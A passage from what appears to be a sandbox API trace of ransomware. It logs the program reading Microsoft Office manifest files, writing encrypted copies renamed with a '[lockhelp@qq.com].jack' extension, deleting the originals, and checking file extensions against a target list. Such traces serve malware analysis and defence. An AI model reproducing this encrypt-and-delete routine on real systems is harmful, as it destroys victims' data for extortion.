office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0205.759] GetLastError () returned 0x0 [0205.759] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0205.941] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0205.942] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.942] SetEndOfFile (hFile=0x43c) returned 1 [0205.942] CloseHandle (hObject=0x43c) returned 1 [0205.949] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.949] SetEndOfFile (hFile=0x3d4) returned 1 [0205.950] CloseHandle (hObject=0x3d4) returned 1 [0205.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 1 [0205.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.951] lstrlenW (lpString=".doc") returned 4 [0205.951] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.951] lstrlenW (lpString=".docx") returned 5 [0205.951] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.951] lstrlenW (lpString=".pdf") returned 4 [0205.951] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.951] lstrlenW (lpString=".xls") returned 4 [0205.951] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.951] lstrlenW (lpString=".xlsx") returned 5 [0205.951] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.951] lstrlenW (lpString=".ppt") returned 4 [0205.951] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.951] lstrlenW (lpString=".zip") returned 4 [0205.951] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.951] lstrlenW (lpString=".rar") returned 4 [0205.952] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString=".bz2") returned 4 [0205.952] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString=".7z") returned 3 [0205.952] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.952] lstrlenW (lpString=".dbf") returned 4 [0205.952] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.952] lstrlenW (lpString=".1cd") returned 4 [0205.952] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.952] lstrlenW (lpString=".jpg") returned 4 [0205.952] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.952] lstrlenW (lpString=".doc") returned 4 [0205.952] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString=".docx") returned 5 [0205.952] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.952] lstrlenW (lpString=".pdf") returned 4 [0205.952] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString=".xls") returned 4 [0205.952] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.952] lstrlenW (lpString=".xlsx") returned 5 [0205.952] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.952] lstrlenW (lpString=".ppt") returned 4 [0205.953] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.953] lstrlenW (lpString=".zip") returned 4 [0205.953] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.953] lstrlenW (lpString=".rar") returned 4 [0205.953] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.953] lstrlenW (lpString=".bz2") returned 4 [0205.953] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.953] lstrlenW (lpString=".7z") returned 3 [0205.953] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.953] lstrlenW (lpString=".dbf") returned 4 [0205.953] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.953] lstrlenW (lpString=".1cd") returned 4 [0205.953] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0205.953] lstrlenW (lpString=".jpg") returned 4 [0205.953] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.953] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.953] lstrlenW (lpString="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 53 [0205.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.954] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1261) returned 1 [0205.954] CloseHandle (hObject=0x3d4) returned 1 [0205.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.954] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.954] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0205.955] GetLastError () returned 0x0 [0205.955] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0206.018] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0206.019] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0206.019] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0206.019] SetEndOfFile (hFile=0x43c) returned 1 [0206.020] CloseHandle (hObject=0x43c) returned 1 [0206.021] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.021] SetEndOfFile (hFile=0x3d4) returned 1 [0206.022] CloseHandle (hObject=0x3d4) returned 1 [0206.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0206.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 1 [0206.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.022] lstrlenW (lpString=".doc") returned 4 [0206.022] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.022] lstrlenW (lpString=".docx") returned 5 [0206.022] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.023] lstrlenW (lpString=".pdf") returned 4 [0206.023] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString=".xls") returned 4 [0206.023] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString=".xlsx") returned 5 [0206.023] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.023] lstrlenW (lpString=".ppt") returned 4 [0206.023] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.023] lstrlenW (lpString=".zip") returned 4 [0206.023] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.023] lstrlenW (lpString=".rar") returned 4 [0206.023] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString=".bz2") returned 4 [0206.023] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString=".7z") returned 3 [0206.023] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.023] lstrlenW (lpString=".dbf") returned 4 [0206.023] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.023] lstrlenW (lpString=".1cd") returned 4 [0206.023] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.023] lstrlenW (lpString=".jpg") returned 4 [0206.023] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.024] lstrlenW (lpString=".doc") returned 4 [0206.024] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString=".docx") returned 5 [0206.024] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.024] lstrlenW (lpString=".pdf") returned 4 [0206.024] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString=".xls") returned 4 [0206.024] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString=".xlsx") returned 5 [0206.024] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.024] lstrlenW (lpString=".ppt") returned 4 [0206.024] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.024] lstrlenW (lpString=".zip") returned 4 [0206.024] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.024] lstrlenW (lpString=".rar") returned 4 [0206.024] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString=".bz2") returned 4 [0206.024] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString=".7z") returned 3 [0206.024] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.024] lstrlenW (lpString=".dbf") returned 4 [0206.024] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.024] lstrlenW (lpString=".1cd") returned 4 [0206.024] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0206.024] lstrlenW (lpString=".jpg") returned 4 [0206.024] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.025] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0206.025] lstrlenW (lpString="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 53 [0206.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0206.025] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3754) returned 1 [0206.025] CloseHandle (hObject=0x3d4) returned 1 [0206.025] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 0x220 [0206.025] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0206.026] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.026] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0206.028] GetLastError () returned 0x0 [0206.028] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xeaa, lpOverlapped=0x0) returned 1 [0206.181] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xeb0, lpOverlapped=0x0) returned 1 [0206.182] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0206.182] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0206.182] SetEndOfFile (hFile=0x43c) returned 1 [0206.182] CloseHandle (hObject=0x43c) returned 1 [0206.183] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.183] SetEndOfFile (hFile=0x3d4) returned 1 [0206.184] CloseHandle (hObject=0x3d4) returned 1 [0206.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0206.185] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 1 [0206.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.185] lstrlenW (lpString=".doc") returned 4 [0206.185] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.185] lstrlenW (lpString=".docx") returned 5 [0206.185] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.185] lstrlenW (lpString=".pdf") returned 4 [0206.185] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.185] lstrlenW (lpString=".xls") returned 4 [0206.185] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.185] lstrlenW (lpString=".xlsx") returned 5 [0206.185] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.186] lstrlenW (lpString=".ppt") returned 4 [0206.186] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.186] lstrlenW (lpString=".zip") returned 4 [0206.186] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.186] lstrlenW (lpString=".rar") returned 4 [0206.186] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString=".bz2") returned 4 [0206.186] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString=".7z") returned 3 [0206.186] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.186] lstrlenW (lpString=".dbf") returned 4 [0206.186] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.186] lstrlenW (lpString=".1cd") returned 4 [0206.186] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.186] lstrlenW (lpString=".jpg") returned 4 [0206.186] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.186] lstrlenW (lpString=".doc") returned 4 [0206.186] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.186] lstrlenW (lpString=".docx") returned 5 [0206.186] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.187] lstrlenW (lpString=".pdf") returned 4 [0206.187] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString=".xls") returned 4 [0206.187] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString=".xlsx") returned 5 [0206.187] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.187] lstrlenW (lpString=".ppt") returned 4 [0206.187] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.187] lstrlenW (lpString=".zip") returned 4 [0206.187] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.187] lstrlenW (lpString=".rar") returned 4 [0206.187] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString=".bz2") returned 4 [0206.187] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString=".7z") returned 3 [0206.187] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.187] lstrlenW (lpString=".dbf") returned 4 [0206.187] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.187] lstrlenW (lpString=".1cd") returned 4 [0206.187] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0206.187] lstrlenW (lpString=".jpg") returned 4 [0206.187] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.188] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0206.188] lstrlenW (lpString="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 53 [0206.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0206.188] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1261) returned 1 [0206.188] CloseHandle (hObject=0x3d4) returned 1 [0206.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft 